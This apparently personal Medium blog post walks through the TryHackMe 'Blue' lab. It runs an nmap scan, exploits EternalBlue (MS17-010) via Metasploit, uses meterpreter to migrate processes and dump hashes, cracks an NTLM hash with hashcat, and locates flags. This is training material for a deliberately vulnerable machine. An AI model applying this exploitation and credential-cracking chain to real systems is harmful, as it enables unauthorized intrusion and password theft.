Open in app

Sign in

Write

Sign in

THM — Blue

Yikai
6 min readNov 21, 2020

--

Nmap Scan

ali@kali:~$ nmap -T4 -sC -sV 10.10.132.197
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-17 08:25 EST
Stats: 0:02:31 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.61% done; ETC: 08:28 (0:00:01 remaining)
Nmap scan report for 10.10.132.197
Host is up (0.37s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
|_ssl-date: 2020-11-17T13:27:15+00:00; +1s from scanner time.
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49160/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 1h30m00s, deviation: 3h00m00s, median: 0s
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:83:df:b2:bb:21 (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-11-17T07:27:04-06:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required                                                                     
| smb2-time:                                                                                                       
|   date: 2020-11-17T13:27:04                                                                                      
|_  start_date: 2020-11-17T13:08:06                                                                                
                                                                                                                   
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                     
Nmap done: 1 IP address (1 host up) scanned in 166.66 seconds

With the title Blue, we can suspect that this box is related to eternal blue vuln.

Spin up metasploit and search eternal blue or ms17–010

From the map scan we know that this is a windows 7 machine.

I will be using module #2 as the exploit for this machine.

Just to be sure let’s use module #1 to scan if this machine is vulnerable to ms17–010.

Under options, we can see that RHOSTS is required.

RHOSTS -> 10.10.132.197

Hit run and see the results.

So now we can confirm that the target machine is vulnerable to ms17–010. Let’s carry on with using metasploit to exploit the machine.

Let’s use the exploit with index number 2.

We need to set the RHOST again.

Notice the LHOST is set to my own machine IP address instead of the THM VPN IP address. We need to change this as well.

Once all are set, we can run this exploit.

It seems the exploit failed. Double-check the options again, and the settings seem fine. I ran it again and got a shell.

If unsure what commands to use for meterpreter shell. Use $help

$ sysinfo

With sysinfo, make sure the meterpreter shell version matches the architecture version.

$ getuid

This command allows us to get the user info that this machine is running as. From below we know that we are SYSTEM, which is equivalent to root.

Let’s try going to the home route.

Cat the flag1.txt out and get the first flag.

Next, let’s use the command: ps . This allows us to list out the processes that are running. Though we might be SYSTEM, the processes might not.

It might take a couple of tries to migrate successfully.

Now by migrating to a higher privileged process, let’s perform the hashdump.

Let’s crack these hashes using hashcat, or you could use an online hash cracker like crackstation.

First, create a file and name it whatever you want.

Using the below command to crack the hashes, using hashcat.

$ hashcat -m 1000 -a 0 ./todelete.txt

-m is for type/mode of hash and 1000 is the Windows NT hahses mode.

-a is for the attack mode, which in this case I selected ‘0’ to use with a wordlist.

kali@kali:~$ hashcat -m 1000 -a 0 ./todelete.txt  /usr/share/wordlists/rockyou.txt 
hashcat (v6.0.0) starting...OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-6560U CPU @ 2.20GHz, 2886/2950 MB (1024 MB allocatable), 4MCUMinimum password length supported by kernel: 0
Maximum password length supported by kernel: 256Hashes: 3 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-HashATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.Host memory required for this attack: 65 MBDictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec31d6cfe0d16ae931b73c59d7e0c089c0:                
ffb43f0de35be4d9917ac0cc8ad57f8d:alqfna22        
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: ./todelete.txt
Time.Started.....: Tue Nov 17 23:15:39 2020 (8 secs)
Time.Estimated...: Tue Nov 17 23:15:47 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1372.5 kH/s (0.69ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 2/2 (100.00%) Digests
Progress.........: 10203136/14344385 (71.13%)
Rejected.........: 0/10203136 (0.00%)
Restore.Point....: 10199040/14344385 (71.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: alsinah -> alonsourielStarted: Tue Nov 17 23:15:08 2020
Stopped: Tue Nov 17 23:15:48 2020

From the above we can see that Jon’s hash is cracked:

ffb43f0de35be4d9917ac0cc8ad57f8d:alqfna22

Next, carrying to find the remaining flags.

Let’s look into C:\Windows\System32\config in the SAM database to find where hashes are stored for the users.

cd there and you should see a flag2.txt.

For the last flag, a cool trick I learn from John Hammond’s youtube walkthrough is the search function of meterpreter.

Here we found the location of the last flag.

Note: Sometimes I could not cd to another windows directory due to using backslashes. But if you use double backslashes it would work fine.

Tryhackme

--

--

Yikai

Written by Yikai

51 Followers

Started my journey in cybersecurity on September 2020. This blog is used mainly to record my learning journey.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams